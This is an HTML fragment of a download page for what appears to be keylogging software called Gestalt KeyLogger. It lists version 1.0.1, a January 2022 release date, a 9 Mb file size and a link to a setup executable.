                        <h3>Download</h3>

                        <ul>
                            <li><b>Latest version:</b> <span>1.0.1</span></li>
                            <li><b>Released on:</b> <span>January 18, 2022</span></li>
                            <li><b>File size:</b> <span>9 Mb</span></li>
                        </ul>

<br />
                        <a href="/gestalt-keylogger/files/GestaltKeyLoggerSetup.exe" class="primary-btn">DOWNLOAD NOW</a>
<br /><br />
